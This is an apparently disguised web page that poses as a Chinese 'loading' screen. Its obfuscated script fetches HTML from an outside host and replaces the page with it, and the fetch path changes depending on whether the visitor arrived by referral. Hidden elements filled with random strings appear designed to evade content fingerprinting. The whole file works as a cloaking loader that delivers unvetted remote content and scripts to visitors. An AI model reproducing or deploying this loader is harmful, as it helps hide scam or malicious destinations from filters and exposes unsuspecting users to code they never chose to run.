<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kJSkqAaFz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kJSkqAaFz .vyfUrbwSgYz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kJSkqAaFz .content {
            line-height: 50px;
            text-align: center
        }

        .kJSkqAaFz .img {
            width: 100%
        }

        .kJSkqAaFz .AOtxmQ {
            text-align: center
        }

        .kJSkqAaFz .AOtxmQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kJSkqAaFz .AOtxmQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kJSkqAaFz .AOtxmQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kJSkqAaFz .AOtxmQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kJSkqAaFz .AOtxmQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kJSkqAaFz .AOtxmQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kJSkqAaFz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dSAXoZWCDUh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var YwU5ENC = dSAXoZWCDUh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ YwU5ENC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ YwU5ENC +".html?a=share";
		}
		
        cjUWzfZAS=url+"#"+new Date().getTime();
        cjUWzfZAS && function() {
            $.get(cjUWzfZAS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>OVvyhiyoOYE3o8t5riG7c8euObyXlFjMznR3lCNhfjIyyTTQ</div>
<h1 style='display:none' >lgb7P3kgOztx659EVhLY9OYcdxNQt0MHLSivBL5JNgyri2C6npaetixhIcS63TteeWQDdfSfygta07otRYlCE8vHBo</h1>
<ul style='display:none' >n4FvV45lCrtadZtystPksWWE7zuebCxCRfs7hszq1CeGccY0M05ByXLfr0k34j29y8TzoabbkRZK</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>jAx3MGZcumdrCehCxpfLH9Sow4</a><div class="kJSkqAaFz">
    <div class="vyfUrbwSgYz">
        <div class="AOtxmQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Ps8R4cor3I3n</p>
<ul style='display:none' >eAedNEMR9era1rGouKX6YgWZ2lOIOcTOi88RonDA3Tw</ul>
<ul style='display:none' >eAedNEMR9era1rGouKX6YgWZ2lOIOcTOi88RonDA3Tw</ul>
<p  style='display:none'>Ps8R4cor3I3n</p>
<span style='display:none'>KDTLngiJog8UQHVqkNDir51L2pnFNpyUoZsuAk2qlSATMLH806k</span></body>
</html>